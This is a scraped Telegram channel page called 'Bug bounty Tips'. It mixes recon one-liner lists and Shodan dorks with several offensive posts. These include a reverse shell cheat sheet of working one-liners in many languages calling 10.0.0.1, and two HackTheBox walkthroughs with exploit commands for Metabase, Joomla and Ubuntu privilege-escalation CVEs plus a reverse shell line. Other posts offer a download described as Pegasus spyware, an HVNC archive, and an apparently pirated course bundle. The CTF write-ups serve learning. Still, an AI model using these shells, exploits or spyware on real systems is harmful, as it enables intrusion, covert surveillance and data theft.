uz
Feedback
Bug bounty Tips

Bug bounty Tips

Kanalga Telegramโ€™da oโ€˜tish

๐Ÿ›ก๏ธ Cybersecurity enthusiast | ๐Ÿ’ป Helping secure the digital world | ๐ŸŒ Web App Tester | ๐Ÿ•ต๏ธโ€โ™‚๏ธ OSINT Specialist Admin: @laazy_hack3r

Ko'proq ko'rsatish
5 849
Obunachilar
+1124 soatlar
+687 kunlar
+37430 kunlar
Postlar arxiv
photo content

photo content

โ€ขย  Amass โ€ขย  Amass + Nuclei: Finding domain โ€ขย  Amass + Nuclei 2: Finding domain โ€ขย  Finding subdomains with jsubfinder + httpx โ€ขย  Using FFUF to finding RCE โ€ขย  Full Account Takeover Technique in API/Register โ€ขย  Oneliner Search JS domain using subjs, anew and httpx โ€ขย  Shodan queries to search Scada, IoT, Router Devices โ€ขย  Screnshoot page using aquatone using domain files โ€ขย  oneliner using shodan and nuclei to scanning hosts โ€ขย  Oneliner finding subdomain using gospider , assetfinder , amass and nuclei โ€ขย  Oneliner portscan and subdomain discovery using subfinder , cf-check, naabu and httprobe โ€ขย  Oneliner search SSRF using subfinder , httpx and qsreplace โ€ขย  Oneliner recon domain and subdomains using chaos, gospider , findomain, assetfinder , amass, httpx and anew โ€ขย  Oneliner search xss using kxss, xargs and httpx โ€ขย  Google dork to discovery api exposure โ€ขย  Create script to finder and test sql injection โ€ขย  Oneliner find xss using subfinder , httpx, katana, gxss, kxss and dalfox โ€ขย  Domain enumeration and discovery files using ffuf, httpx and findomain โ€ขย  oneliner find open redirect using waybackurls, httpx, gf, anew and nuclei โ€ขย  Oneliner complete enumeration xss, lfi, ssrf in domain using gauplus, anew, gxss, gf, qsreplace, httpx and SecretFinder โ€ขย  Oneliner check cloudflare using subfinder , dnsx, cf-check, naabu โ€ขย  Oneliner recon jira using uncover with shodan, censys and fofa and vulnerability scan with nuclei โ€ขย  Oneliner recon subdomain using assetfinder , httpx, xargs, waybackurls and nuclei vulnerability scan โ€ขย  Oneliner extract js using haktrails, httpx, getjs, anew, tojson โ€ขย  Oneliner LFI using gau, gf, qsreplace and xargs

Repost from OSINT Library
#BugBounty #ChatGPT

๐Ÿ”ฐ ๐‘ช๐’€๐‘ฉ๐‘ฌ๐‘น ๐‘บ๐‘ฌ๐‘ช๐‘ผ๐‘น๐‘ฐ๐‘ป๐’€ ๐‘ช๐‘ถ๐‘ณ๐‘ณ๐‘ฌ๐‘ช๐‘ป๐‘ฐ๐‘ถ๐‘ต ๐Ÿ”ฐ ๐‘ช๐’๐’๐’๐’†๐’„๐’•๐’Š๐’๐’ ๐‘ณ๐’Š๐’”๐’•: โ—๐๐ฎ๐  ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐€๐ง๐๐ซ๐จ๐ข๐ ๐‡๐š๐œ๐ค๐ข๐ง๐  โ—๐๐ฎ๐ ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐‡๐ฎ๐ง๐ญ๐ข๐ง๐  ๐†๐ฎ๐ข๐๐ž ๐ญ๐จ ๐š๐ง ๐€๐๐ฏ๐š๐ง๐œ๐ž๐ ๐„๐š๐ซ๐ง๐ข๐ง๐  ๐Œ๐ž๐ญ๐ก๐จ๐ โ—๐๐ฎ๐  ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐‡๐ฎ๐ง๐ญ๐ข๐ง๐  ๐Ž๐Ÿ๐Ÿ๐ž๐ง๐ฌ๐ข๐ฏ๐ž ๐€๐ฉ๐ฉ๐ซ๐จ๐š๐œ๐ก ๐ญ๐จ ๐‡๐ฎ๐ง๐ญ ๐๐ฎ๐ ๐ฌ โ—๐๐ฎ๐  ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐–๐ž๐› ๐‡๐š๐œ๐ค๐ข๐ง๐  โ—๐‚๐ˆ๐’๐’๐ ๐Ÿ๐ฎ๐ฅ๐ฅ ๐‚๐จ๐ฎ๐ซ๐ฌ๐ž ๐Ÿ๐ŸŽ๐Ÿ๐ŸŽ โ—๐‡๐š๐ง๐๐ฌ ๐จ๐ง ๐๐ž๐ง๐ž๐ญ๐ซ๐š๐ญ๐ข๐จ๐ง ๐“๐ž๐ฌ๐ญ๐ข๐ง๐  ๐‹๐š๐›๐ฌ โ—๐‹๐ž๐š๐ซ๐ง ๐‚๐ซ๐š๐œ๐ค๐ข๐ง๐  ๐–๐ˆ-๐…๐ˆ ๐ฉ๐š๐ฌ๐ฌ๐ฐ๐จ๐ซ๐๐ฌ ๐ค๐ž๐ฒ๐ฌ ๐–๐„๐, ๐–๐๐€ ๐–๐๐€๐Ÿ โ—๐‹๐ž๐š๐ซ๐ง ๐๐ฒ๐ญ๐ก๐จ๐ง & ๐„๐ญ๐ก๐ข๐œ๐š๐ฅ ๐‡๐š๐œ๐ค๐ข๐ง๐  ๐Ÿ๐ซ๐จ๐ฆ ๐’๐œ๐ซ๐š๐ญ๐œ๐ก โ—๐Œ๐š๐ฌ๐ญ๐ž๐ซ๐ฌ ๐ข๐ง ๐„๐ญ๐ก๐ข๐œ๐š๐ฅ ๐‡๐š๐œ๐ค๐ข๐ง๐  ๐ฐ๐ข๐ญ๐ก ๐€๐ง๐๐ซ๐จ๐ข๐ โ—๐๐ซ๐š๐œ๐ญ๐ข๐œ๐š๐ฅ ๐๐ฎ๐  ๐๐จ๐ฎ๐ง๐ญ๐ฒ โ—๐๐ซ๐š๐œ๐ญ๐ข๐œ๐š๐ฅ ๐„๐ญ๐ก๐ข๐œ๐š๐ฅ ๐‡๐š๐œ๐ค๐ข๐ง๐  โ—๐‘๐ž๐๐“๐ž๐š๐ฆ ๐๐ฅ๐ฎ๐ž๐ฉ๐ซ๐ข๐ง๐ญ โ€“ ๐€ ๐ฎ๐ง๐ข๐ช๐ฎ๐ž ๐ ๐ฎ๐ข๐๐ž ๐ญ๐จ ๐„๐ญ๐ก๐ข๐œ๐š๐ฅ ๐‡๐š๐œ๐ค๐ข๐ง๐  โ—๐’๐ฉ๐ฅ๐ฎ๐ง๐ค ๐‡๐š๐ง๐๐ฌ ๐จ๐ง ๐ญ๐ก๐ž ๐‚๐จ๐ฆ๐ฉ๐ฅ๐ž๐ญ๐ž ๐ƒ๐š๐ญ๐š ๐€๐ง๐š๐ฅ๐ฒ๐ญ๐ข๐œ๐ฌ โ—๐“๐ก๐ž ๐‚๐จ๐ฆ๐ฉ๐ฅ๐ž๐ญ๐ž ๐„๐ญ๐ก๐ข๐œ๐š๐ฅ ๐‡๐š๐œ๐ค๐ข๐ง๐  ๐‚๐จ๐ฎ๐ซ๐ฌ๐ž โ—๐“๐ก๐ž ๐‚๐จ๐ฆ๐ฉ๐ฅ๐ž๐ญ๐ž ๐‡๐š๐œ๐ค๐ข๐ง๐  ๐‚๐จ๐ฎ๐ซ๐ฌ๐ž, ๐›๐ฒ ๐†๐ž๐ซ๐ซ๐ข ๐๐š๐ง๐Ÿ๐ข๐ž๐ฅ๐ โ—๐“๐ก๐ž ๐‚๐จ๐ฆ๐ฉ๐ฅ๐ž๐ญ๐ž ๐๐š๐ฆ๐ฉ ๐๐จ-๐๐จ๐ง๐ฌ๐ž๐ง๐ฌ๐ž ๐‚๐จ๐ฎ๐ซ๐ฌ๐ž โ—๐–๐ข-๐…๐ข ๐„๐ญ๐ก๐ข๐œ๐š๐ฅ๐‡๐š๐œ๐ค๐ข๐ง๐  ๐ฐ๐ข๐ญ๐ก ๐Š๐š๐ข๐ฅ โ—๐–๐ข๐ง๐๐จ๐ฐ๐ฌ ๐๐ซ๐ข๐ฏ๐ข๐ฅ๐ž๐ ๐ž ๐„๐ฌ๐œ๐š๐ฅ๐š๐ญ๐ข๐จ๐ง ๐Ÿ๐จ๐ซ ๐๐ž๐ ๐ข๐ง๐ž๐ž๐ซ๐ฌ โ—๐–๐ข๐ง๐๐จ๐ฐ๐ฌ ๐๐ซ๐ข๐ฏ๐ข๐ฅ๐ž๐ ๐ž ๐„๐ฌ๐œ๐š๐ฅ๐š๐ญ๐ข๐จ๐ง ๐Ÿ๐จ๐ซ ๐Ž๐’๐‚๐ & ๐๐ž๐ฒ๐จ๐ง๐! ๐Ÿ“‚Size: 103.7GB+ โ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌ ๐Ÿ”— GDrive Link : https://drive.google.com/drive/folders/183SSU6GShal0mzAckd6m9kk0eF2KpcEV?usp=sharing https://t.me/bugbounty_tech โ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌโ–ฌ

Repost from Cyber Detective
Interesting way to use LEGBA (https://github.com/evilsocket/legba) #bruteforce tool from twitter.com/evilsocket - enumeration
Interesting way to use LEGBA (https://github.com/evilsocket/legba) #bruteforce tool from twitter.com/evilsocket - enumeration valid emails for G Suite domain. Read more about LEGBA: https://www.evilsocket.net/2023/11/02/Enumerate-Bruteforce-Attack-All-The-Things-Presenting-Legba/

Some Shodan Dorks that might useful in Bug Bounty. 1. org:"http://target. com" 2. http.status:"<status_code>" 3. product:"<Product_Name>" 4. port:<Port_Number> โ€œService_Messageโ€ 5. port:<Port_Number> โ€œService_Nameโ€ 6. http.component:"<Component_Name>" 7. http.component_category:"<Component_Category> 8. http.waf:"<firewall_name>" 9. http.html:"<Name>" 10. http.title:"<Title_Name>" 11. ssl.alpn:"<Protocol>" 12. http.favicon.hash:"<Favicon_Hash>" 13. net:"<Net_Range>" (for e.g. 104.16.100.52/32) 14. http://ssl.cert.subject.cn:"<http://Domain .com>" 15. asn:"<ASnumber>" 16. hostname:"<hosthame>" 17. ip:"<IP_Address>" 18. all:"<Keyword>" 19. โ€œSet-Cookie: phpMyAdminโ€ 20. โ€œSet-Cookie: lang=" 21. โ€œSet-Cookie: PHPSESSID" 22. โ€œSet-Cookie: webvpnโ€ 23. โ€œSet-Cookie:webvpnlogin=1" 24. โ€œSet-Cookie:webvpnLang=enโ€ 25. โ€œSet-Cookie: mongo-express=" 26. โ€œSet-Cookie: user_id=" 27. โ€œSet-Cookie: phpMyAdmin=" 28. โ€œSet-Cookie: _gitlab_sessionโ€ 29. โ€œX-elastic-product: Elasticsearchโ€ 30. โ€œx-drupal-cacheโ€ 31. โ€œaccess-control-allow-originโ€ 32. โ€œWWW-Authenticateโ€ 33. โ€œX-Magento-Cache-Debugโ€ 34. โ€œkbn-name: kibanaโ€

+3
PegasusHVNC2-main.zip2.26 KB

Pegasus Full Pegasus is a spyware developed by the Israeli cyber-arms company NSO Group that is designed to be covertly and remotely installed on mobile phones running iOS and Android. Download Link:- CyberSleuthPacks/Pegasus NOTE:-Please do not run it on your native windows

๐Ÿ“š A gentleman's set for a beginner of 4 books on hacking. 1. Hacking like a porn star. โ€œWhen we sympathize with suffering, we act like all people; making them easier, like God.โ€ Horace Mann 2. Hacking with the skill of God. โ€œLuck is when preparation meets opportunity.โ€ Seneca 3. Investigate cybercrimes like a rock star. โ€œWhen I'm standing at the starting gate, it's just me and the slope.โ€ Mikaela Shiffrin 4. Hacking like a legend. โ€œI am a blank slate, and therefore I can create whatever I want.โ€ Tobey Maguire โบ Read books #book //โ“ cyber in network security

Reverse Shell Cheat Sheet Bash; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Python; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PERL; perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' PHP; php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Ruby; ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat; nc -e /bin/sh 10.0.0.1 1234 Java; r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() xterm; xterm -display 10.0.0.1:1

Journey through Analytical CTF: Unveiling Vulnerabilities and Escalating Privileges Recently, I had the exhilarating experience of delving into the Analytical CTF, where every step seemed like a puzzle waiting to be solved. Here's a detailed account of my journey: Discovering the Target Upon initiating the challenge, I quickly identified the target IP as 10.10.11.233 and added it to my /etc/hosts file for easy access. Unveiling Metabase Vulnerability My exploration began with a visit to analytical.htb, revealing a login page under data.analytical.htb. A swift investigation led me to discover a potential Remote Code Execution (RCE) vulnerability within Metabase, marked as CVE-2023-38646. After scouring through resources, I stumbled upon the proof of concept (POC) on GitHub:
git clone https://github.com/securezeron/CVE-2023-38646
To exploit this vulnerability, I executed the following commands:
python3 exploit.py --rhost http://data.analytical.htb --lhost <ip> --port <4444>
nc -lnvp 4444
These commands provided crucial insights into the system, revealing "/proc/self/environ" and uncovering login credentials:
META_USER=meta********
META_PASS=An4l**************8
Gaining Initial Access With the obtained credentials, I swiftly gained SSH access:
ssh metalytics@analytical.htb
This breakthrough enabled me to acquire the user flag:
user.txt : 9d1f6be*************************
Privilege Escalation Endeavors Eager to escalate privileges, I probed for sudo permissions but to no avail. Nevertheless, I gleaned system information using commands such as id, uid, and uname -a, revealing the system's configuration:
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
Further exploration led me to uncover vulnerabilities, notably the "CVE-2023-2640 and CVE-2023-32629," also known as GameOver(lay). Referencing available POCs, I crafted an exploit script:
wget https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh
The script, designed to exploit Ubuntu privilege escalation vulnerabilities, facilitated my journey towards root privileges:
bash exploit.sh
Root Access Achieved Executing the exploit script proved fruitful, granting me root access to the system:
root.txt : 9b30872bc********************
With this, I concluded my expedition through the Analytical CTF, armed with newfound knowledge and triumphs. The journey underscored the importance of meticulous exploration and resourcefulness in navigating complex cybersecurity challenges.

Hey, guys i am looking for a good trainer, from bangalore, If anyone here intrested or anyone you know from bangalore, do let me know. ๐Ÿ˜„

Target IP: 10.10.11.2* Upon initiating the reconnaissance phase with Nmap, I unearthed several open ports: - Port 22 (SSH) - Port 80 (HTTP) - Port 2170 (eyetv) Proceeding with a meticulous Gobuster scan, I uncovered a few directories such as /images, /css, and /js, all of which returned a discouraging 403 Forbidden error. Undeterred, I decided to explore the DNS, where I stumbled upon a promising subdomain, dev, which I promptly added to my /etc/hosts file for further investigation. Next, I randomly got the idea to check robots.txt file and struck gold โ€”a directory named administrator, suggesting that the site was running Joomla. Furthermore, my interest piqued upon discovering a recently disclosed CVE: 2023-23752. I quickly checked GitHub and stumbled upon a finding an exploit at [Acceis/exploit-CVE-2023-23752](https://github.com/Acceis/exploit-CVE-2023-23752?tab=readme-ov-file). Executing the exploit with Ruby, I targeted the vulnerable URL and successfully obtained login credentials: - Username: le*** - DB Password: P4nth*************## With the acquired credentials, I gained administrative access to the system. Navigating to System > Administrator Templates > index.php, I leveraged a bash script to establish a reverse shell:
# exec("/bin/bash -c 'bash -i >& /tcp/dev 10.10.14.*/4433 0>&1'")
Subsequently, I listened on port 4433 with Netcat and stabilized the shell using Python's pty:
stty raw -echo; fg
Aware that MySQL was operational, I accessed it with:
mysql -u lew** -p
Inside the Joomla database, I explored the sd4fg_user table, revealing encrypted passwords for both 'lewis' and 'logan'. Having cracked 'logan's password using John the Ripperโ€” teq********** I successfully logged in via SSH. Voilร ! I secured the user.txt: d6a93fb199df******************** ### Privilege Escalation: Upon inspecting commands running under 'logan', I singled out /usr/bin/apport-cli. Upon executing sudo /usr/bin/apport-cli -f, a menu prompted me to choose options 1, 2, or V for viewing the report. Inspecting the environment variables, I noticed:
== ProcEnviron =================================
LANG=en_US.UTF-8
TERM=xterm-256color
PATH=(custom, no user)
SHELL=/bin/bash
Lastly, a tantalizing '!' prompted me to execute it, granting me root access. Eureka! I triumphantly retrieved the root.txt: 85518faf01*************** With that, I successfully navigated through the intricate maze of challenges, honing my cybersecurity skills along the way. Until the next CTF adventure, stay curious and keep exploring!

CTF Walkthrough: DEvvortex - Gaining Root Access Recently, I had the opportunity to delve into a captivating Capture The Flag
CTF Walkthrough: DEvvortex - Gaining Root Access Recently, I had the opportunity to delve into a captivating Capture The Flag (CTF) challenge where I encountered a series of intriguing hurdles. Let me walk you through the steps I took to conquer this challenge.

Check out, how to use the hackerone
+7
Check out, how to use the hackerone

Ready to level up your Bug Bounty game? Read through to discover the top 5 mistakes to avoid! ๐Ÿ›ก๏ธ๐Ÿ’ป
Ready to level up your Bug Bounty game? Read through to discover the top 5 mistakes to avoid! ๐Ÿ›ก๏ธ๐Ÿ’ป

Top 8 cyber attacks of 2024
Top 8 cyber attacks of 2024

Bug bounty Tips - Telegram kanali @bugbounty_tech statistikasi va tahlili